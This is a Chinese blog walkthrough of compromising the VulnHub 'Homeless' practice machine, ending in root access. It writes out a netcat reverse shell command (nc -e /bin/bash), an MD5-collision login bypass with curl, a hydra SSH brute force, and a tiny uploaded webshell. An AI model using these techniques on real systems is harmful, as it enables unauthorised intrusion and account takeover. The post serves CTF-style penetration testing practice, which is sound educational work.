渗透测试之靶机试炼(十)

最新推荐文章于 2021-06-24 22:44:15 发布
最新推荐文章于 2021-06-24 22:44:15 发布
阅读量1k 收藏 8
点赞数 2
分类专栏: 靶机试炼 文章标签: 渗透测试 CTF 主机提权 web安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/simple___sunny/article/details/89026855
版权

靶机简介

靶机地址:
https://download.vulnhub.com/homeless/

运行环境:
VirtualBox

攻击测试机环境
kali
win 10
工具简介

nmap
dirb
python
nc
burp
curl
fastcoll
tail

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。

在这里插入图片描述首先使用nmap进行主机IP发现
命令:nmap 10.211.55.0/24
在这里插入图片描述从结果中得知靶机开启了80端口与22端口,应该是常规web渗透于ssh登录
访问80端口
在这里插入图片描述页面没发现什么可用信息,查看源码
在这里插入图片描述发现这里有点奇怪,把我的User-Agent打印出来了
然而并没有突破性发现 常规思路 扫目录
命令:dirb http://10.211.55.49/
在这里插入图片描述法案robots.txt文件,访问
在这里插入图片描述给了一些提示 rockyou是kali自带的字典 但是并不知道需要干什么,在这里陷入了沉思。。。。。
想到之前找到的那个打印User-Agent,是不是有其他用途,抓包更改
在这里插入图片描述不论你输入什么,他都会直接打印返回,猜想是否需要输入正确的字符串才会给提示。好吧,继续信息收集吧
到最后也没找到,去网上找教程了
发现说是主页的源码里的图片有问题
http://10.211.55.49/images/favicon.jpg
在这里插入图片描述说是最顶端有一排字,这谁看的清啊
不管怎么说,继续搞吧
教程说 将User-Agent内容替换为cyberdog就会给提示
继续吧
在这里插入图片描述果然给了一个目录 访问
在这里插入图片描述是个上传页面
在这里插入图片描述想直接上传个木马 呵呵想的太简单了 一句话都显示文件大 做了大小限制,经过测试只能上传8个字符
在这里插入图片描述百度一下最短webshell,找到一种方法可以执行命令
在这里插入图片描述
传上去看看

在这里插入图片描述这里直接给了目录,我们访问
在这里插入图片描述给了一个txt文件 访问
在这里插入图片描述又给了一个id目录 访问
在这里插入图片描述看到上面有一个提示 点击
在这里插入图片描述下载了主页备份文件,登录窗口三个输入框,要求输入的之不一样 但是MD5一样
这里又看了教程 没百度到
使用三个exe文件
fastcoll下载链接:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

tail.exe下载链接:https://www.trisunsoft.com/tail-for-windows.htm

curl.exe下载链接:https://curl.haxx.se/windows/

利用这三个exe程序生成三个名称不同但是MD5相同的 按照大牛的教程 如下

D:\fastcoll>fastcoll_v1.0.0.5.exe -o jlzj0 jlzj1      
#-o参数代表随机生成两个相同MD5的文件
D:\fastcoll>fastcoll_v1.0.0.5.exe -p jlzj1 -o jlzj00 jlzj01  
#-p参数代表根据jlzj1文件随机生成两个相同MD5的文件,注意:生成的MD5与jlzj1不同
D:\fastcoll>tail.exe -c 128 jlzj00 > a                
#-c 128代表将jlzj00的最后128位写入文件a,这128位正是jlzj1与jlzj00的MD5不同的原因
D:\fastcoll>tail.exe -c 128 jlzj01 > b                
#同理
D:\fastcoll>type jlzj0 a > jlzj10                    
#这里表示将jlzj0和a文件的内容合并写入jlzj10
D:\fastcoll>type jlzj0 b > jlzj11                    
#同理写入jlzj11

最终执行
curl.exe --data-urlencode username@D:\fastcoll\jlzj00 --data-urlencode password@D:\fastcoll\jlzj01 --data-urlencode code@D:\fastcoll\jlzj10 --data-urlencode “remember=1&login=Login” http://10.211.55.8/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php -i
获取cookie
在这里插入图片描述利用获取的cookie进入系统admin.php页面
在这里插入图片描述给了一个命令执行的页面,可以直接拿到shell
本地监听
nc -lvp 1234
在这里插入图片描述
命令执行
nc -e /bin/bash 10.211.55.8 1234
在这里插入图片描述获取了shell
利用python 获取交互式shell
python -c ‘import pty;pty.spawn("/bin/bash")’
在home目录下发现一个用户,进去发现有些文件没有去权限看
在这里插入图片描述这里使用hydra进行密码爆破
hydra -l downfall -P rockyou.txt 10.211.55.49 ssh
之前提示的密码文件使用rockyou.txt 为kali自带的密码文件位置:/usr/share/wordlist/rockyou.txt
在这里插入图片描述得到密码后我们ssh连接
在这里插入图片描述通过查看用户目录下文件得知在/lib/logs/目录下存在一个py脚本文件
在这里插入图片描述
切换到/lib/logs目录下,会提示一条消息,你有一封新邮件/var/mail/downfall
我们去查看
在这里插入图片描述发现系统每分钟会以root权限执行命令cd /lib/logs/ && ./homeless.py
我们修改py脚本即可获取root权限
修改homeless.py内容如下
在这里插入图片描述保存 本地监听8899端口
在这里插入图片描述
获取root权限。

一只会飞天的松鼠
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
clone-fastcoll:从 http 克隆 fastcoll_v1.0.0.5_source.zip
06-10
克隆-fastcoll 从克隆 fastcoll_v1.0.0.5_source.zip
MD5碰撞工具fastcoll及其源码,构造前缀碰撞法和王小云等的四篇论文
12-08
压缩包包含了MD5碰撞工具fastcoll,可以较为快速地生成字符串或文件的MD5 碰撞。还包含了fastcoll工具原理——构造前缀碰撞法、md5快速碰撞的论文和王小云的两篇hash碰撞论文,构造前缀碰撞法和md5快速碰撞的论文作者Marc Stevens即是fastcoll工具的作者
利用fastcoll实现MD5碰撞
LYJ20010728的博客
03-07 2391
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
fastcoll:快速MD5碰撞生成器
prettyX的博客
03-29 6900
资源下载 程序:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip 源码:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
使用fastcoll进行md5碰撞,两个不同的文件md5值一样。
热门推荐
十年磨一剑,霜刃未曾试!
06-26 1万+
生成两个文件 fastcoll_v1.0.0.5.exe -p C:\windows\notepad.exe -o D:\notepad1.exe D:\notepad2.exe 比较 md5 校验是一样的,但是文件内容不一样。 两个程序的文件内容不一样,运行的效果打印的东西不一样,一个打印循环打印Goodbye World,一个只打印Hello world。但是md5却一样
安恒月赛writeup 2019年2月
SsMing的博客
02-24 2359
新年劝退赛,菜的真实,web一题不会,暴风流泪 MISC 玩游戏 下载附件后,得到一个exe和题目说明,运行exe后,发现题目分为三个关卡 第一关 看见是解盲文,有在线解盲文的网站,解密后为下面图中所示 看见这一串,数了位数后怀疑是一个字符串的md5值,百度之后发现是 hello 的MD5值,第一关通过 第二关 要提交两个MD5值相同的文件,使用工具fastcoll (...
靶机Homeless
weixin_43940853的博客
01-03 424
kali : 192.168.230.236 靶机 : 192.168.230.245 打开web网页,查看源码,发现了user-agent信息,后经过测试,抓包后修改user-agent信息会回显,考虑如何利用它 还是看源码信息,这里有一个位置的图片,访问一下 如果不是看别人的wp,给我一万年也做不出来 我们需要在agaent字段填上这个图片的字段 “Cyber​​dog Sleddin...
使用fastcoll生成字符串MD5碰撞
克格莫
06-24 5937
CTF的时候会遇到诸如$a!=$b&&md5($a)===md5($b)的题。 这就要求我们找到这样的两个字符串a和b,内容不同,但md5值相同。这就涉及到md5的碰撞。 我们使用fastcoll来快速生成这种碰撞。 1.建立一个a.txt,内容如下: 2.将这个文件拖到fastcoll_v1.0.0.5.exe上,等于使用fastcoll打开它。 3.fastcoll会自动生成两个文件: 这两个文件内容不同,但是md5值是相同的。 然后我们写一个php脚本根据生成的文件生成碰撞的字符
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
fastcoll_v1.0.0.5.exe
02-26
fastcoll_v1.0.0.5.exe MD5伪造工具 每一个文件都有自己的文件指纹(MD5值等等相当shenfen证),很多平台会检测文件是否重复(如:1688的详情页图片是否原创检测、百度图片原创筛选、各大视频平台去重等等,他们机器检测MD5发现有与数据库中重复的轻则账号降权,重则被对应平台直接删除)。工具修改后相当文件拥有了新的指纹,可有效规避些类问题,提高工作效率。
fastcoll伪造MD5值
10-31
MD5是目前最热门的加密算法,我们通常用MD5值来验证文件的完整性。例如在一些比较正规的下载网站,通常会提供软件的MD5值,这样我们就可以对下载回来的文件用MD5校检软件(如HashX等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。但当两个不同文件的MD5值完全一样时,你还会信任MD5吗? 找出破解MD5加密方法的专家是我国山东大学的王小云教授,这则新闻在以前的软件版块曾详细报道过。但之后MD5的破解一直没有进展,直到最近,国外的科学家研究出了新的MD5碰撞破解方法,可以让两个不同文件的MD5值完全一样,而之前我们一直认为一个文件的MD5值在世界上是独一无二的,这就像一个人克隆了你的指纹然后冒充你一样恐怖! 为了验证MD5值的独一无二性,我们来做一个简单的试验: 在桌面上新建一个文本文档,文件名为“test.txt”,内容为“OfficeBa”。然后将这个文本文档拖动到校验工具HashX中,点击左上角的“Hash File”按钮,得到其MD5值为051cb2917a5b70505e1687dee449c765,然后为文档中的“OfficeBa”加上双引号,保存后再通过HashX进行校检,发现MD5值变成了9ab117400993b70bc9945a9b15749d5d了。可见,一个极细微的变动都会导致文件的MD5值不同! 那么我们能让两个程序文件的MD5一致,却又都能正常运行,并且可以做完全不同的事情么?答案是:“可以!”。要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成我们同样以刚才的test.txt来做试验: -h [--help] 显示选项 -q [--quiet] 简化 -i [-ihv] arg 使用指定的初始值,默认是md5初始值 -p [-prefixfile] arg 使用给定的前缀计算初始值,仍然把数据复制到输出文件中(必须是个文件名) -o [--out] arg 指定输出文件名,此选项必须是最后一个参数,而且两个文件名必须同时指定 默认的是 -o msg1.bin msg2.bin 把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验他们的MD5值,可以发现是完全一样的,但是在HashX中用“SHA-1”加密算法进行校验的时候,结果竟然是不同的(SHA-1加密算法生成的结果也是独一无二的)!可见这已经是完全不同的两个文件,但是他们的MD5值竟然完全相同。 如果黑客从网上下载一个工具,给其捆绑上木马,然后通过工具让其MD5值和原文件一样。那么当用户下载了文件后用MD5校验工具进行校验时就会发现带毒文件和原文件MD5值完全一样,就会放心地去运行,结果可想而知。所以,MD5加密已经不再可信!
快速MD5碰撞生成器fastcoll源码
03-22
fastcoll源码,可以将原文件生成出2个新MD5值相同的文件
更改文件MD5值 + 源码.7z FastColl 最新版
07-07
要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成。   PS:我也不知道原理是为什么,有知道的嘛?
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
DC-4
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
kali linux渗透测试靶机
最新发布
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值